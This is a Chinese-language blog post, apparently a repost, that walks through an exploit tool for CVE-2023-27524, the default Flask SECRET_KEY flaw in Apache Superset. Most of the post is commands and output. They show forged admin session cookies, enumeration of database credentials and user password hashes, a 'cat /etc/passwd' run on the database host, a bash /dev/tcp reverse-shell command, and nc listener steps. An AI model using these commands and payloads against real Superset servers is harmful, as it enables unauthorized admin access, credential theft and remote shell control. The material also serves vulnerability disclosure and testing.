CVE-2023-27524:Apache Superset Auth 绕过和 RCE
CVE-2023-27524:Apache Superset Auth 绕过和 RCE
Khan安全团队
发布于 2024-01-08 11:03:39
发布于 2024-01-08 11:03:39
Apache Superset 是一种广泛使用的数据可视化和探索开源工具,已被确定存在潜在的安全漏洞,可能导致身份验证绕过和远程代码执行 (RCE)。这些漏洞可能使恶意行为者能够获得目标服务器上的管理权限,从而使他们能够收集用户凭据并可能危及数据。
所涉及的具体安全问题是一个不安全的默认配置漏洞,称为 CVE-2023-27524。
根本原因在于安装过程中设置的可预测的 Flask Secret Key,影响了大量暴露的 Apache Superset 实例。尽管已经采取了一些缓解措施,但对于那些尚未更新其配置的人来说,此漏洞仍然是一个严重的问题。
官方漏洞描述:
Apache Superset 2.0.1 及之前版本中的会话验证攻击。未根据安装说明更改默认配置的 SECRET_KEY 的安装允许攻击者验证和访问未经授权的资源。这不会影响更改 SECRET_KEY 配置默认值的 Superset 管理员。
用法
安装 PIP 包:
pip3 install -r requirements.txt usage: exploit.py [-h] --url URL [--id ID] [--wordlist WORDLIST] [--validate] [--enum-dbs] [--enum-users] [--cmd CMD]
[--revshell REVSHELL] [--db-host]
options:
-h, --help show this help message and exit
--url URL, -u URL Host URL
--id ID User ID to forge session cookie for. Default=1
--wordlist WORDLIST, -w WORDLIST
Specify a wordlist file (default is 10.txt)
--validate, -v Validate the presence of vulnerability by login attempt
--enum-dbs, -dbs Enumerate databases
--enum-users, -eu Enumerate databases
--cmd CMD, -c CMD Run custom OS command on the database's server.
--revshell REVSHELL Specify IP:Port for reverse shell
--db-host Run commands or open reverse shell on the database server验证漏洞并尝试使用自定义单词列表破解应用程序
# python3 exploit.py --url http://localhost:8088 -v -w 10k_most_common_passwords.txt
[+] Session cookie found.
[+] Decoded session cookie: <REDACTED>
[+] Using '10k_most_common_passwords.txt' as a wordlist.
[+] Superset instance is VULNERABLE to CVE-2023-27524.
[+] Using default SECRET_KEY: b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET'
[+] Forged session cookie for user 1: <REDACTED>
[+] Superset Version: 2.0.1
[+] Login successful. Vulnerability is validated.枚举数据库
# python3 exploit.py -u http://localhost:8088 --enum-dbs
[+] Session cookie found.
[+] Decoded session cookie:
{'csrf_token': '5d4c9ad6caf94bc1c652b0fc8e8739d19c45c05a', 'locale': 'en'}
[+] Using default secret keys.
[+] Superset instance is VULNERABLE to CVE-2023-27524.
[+] Secret key found: "b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET'"
[+] Forged session cookie for user 1:
eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZPsQ6Q.nKTBZiUq-Cu0iWSLQIUtB2W9HnM
[+] Version 2.0.1 seems vulnerable.
[+] Enumerating databases via API...
[+] Found database: "examples" with password "superset".
[+] Found database: "SQLite".
[+] Enumerating database connection data and cracking password if possible...
+-----------------+---------------------------------------------------+--------------------------+----------------------+
| database_name | sqlalchemy_uri | password | decrypted_password |
|-----------------+---------------------------------------------------+--------------------------+----------------------|
| examples | postgresql://superset:XXXXXXXXXX@db:5432/superset | MAqp6AIikZpDM5bMH4MMgA== | superset******** |
| SQLite | sqlite+pysqlite:////app/superset_home/superset.db | | |
+-----------------+---------------------------------------------------+--------------------------+----------------------+
[+] Process of enumerating databases finished.枚举 Superset 用户
# python3 exploit.py -u http://localhost:8088 --enum-users
[+] Session cookie found.
[+] Decoded session cookie:
{'csrf_token': '2a3adb09bac36c330a77c74da1cca27c431779e8', 'locale': 'en'}
[+] Using default secret keys.
[+] Superset instance is VULNERABLE to CVE-2023-27524.
[+] Secret key found: "b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET'"
[+] Forged session cookie for user 1:
eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZPsRCQ.qeci7JgO5Lb4AwexB0Qojp5RDbs
[+] Version 2.0.1 seems vulnerable.
[+] Checking existing metadata database connection...
[+] Settings of database with id 1 were successfully modified.
[+] Settings of database with id 2 were successfully modified.
[+] Superset metadata connection is already added with id 2.
[+] Trying to enumerate Superset users...
[+] RESULT:
+------------+--------------------------------------------------------------------------------------------------------+
| username | password |
|------------+--------------------------------------------------------------------------------------------------------|
| admin | pbkdf2:sha256:260000$z5y5YnluWzyx4kd2$33c40dfefdea9aedef6ed171a941492516ba49c1ed8ed740d7e05446ce639c0e |
+------------+--------------------------------------------------------------------------------------------------------+运行自定义操作系统命令
在 Superset 服务器上:
# python3 exploit.py --url http://localhost:8088 --cmd 'bash -i >& /dev/tcp/<IP>/4242 0>&1'请注意,在这种情况下还无法查看输出。
在数据库服务器上:
# python3 exploit.py -u http://localhost:8088 --cmd 'cat /etc/passwd' --db-host
[+] Session cookie found.
[+] Decoded session cookie:
{'csrf_token': 'c2154d7077f507bd69c791f9d6de49115ba290a3', 'locale': 'en'}
[+] Using default secret keys.
[+] Superset instance is VULNERABLE to CVE-2023-27524.
[+] Secret key found: "b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET'"
[+] Forged session cookie for user 1:
eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZPsRMw.haTjE2XBuVjamMvsdg7SemBr3Ig
[+] Version 2.0.1 seems vulnerable.
[+] Trying to run command on the database server...
[+] Settings of database with id 1 were successfully modified.
[+] $ cat /etc/passwd
+-----------------------------------------------------------------------------------+
| cmd_output |
|-----------------------------------------------------------------------------------|
| root:x:0:0:root:/root:/bin/bash |
| daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin |
| <REDACTED> |
| postgres:x:999:999::/var/lib/postgresql:/bin/bash |
+-----------------------------------------------------------------------------------+打开反向shell
在 Superset 服务器上:
# Terminal 1
nc -lvnp [PORT]
# Terminal 2
python3 exploit.py -u http://localhost:8088 --revshell [IP]:[PORT]在数据库服务器上:
# Terminal 1
nc -lvnp [PORT]
# Terminal 2
python3 exploit.py -u http://localhost:8088 --revshell [IP]:[PORT] --db-host本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2023-12-31,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读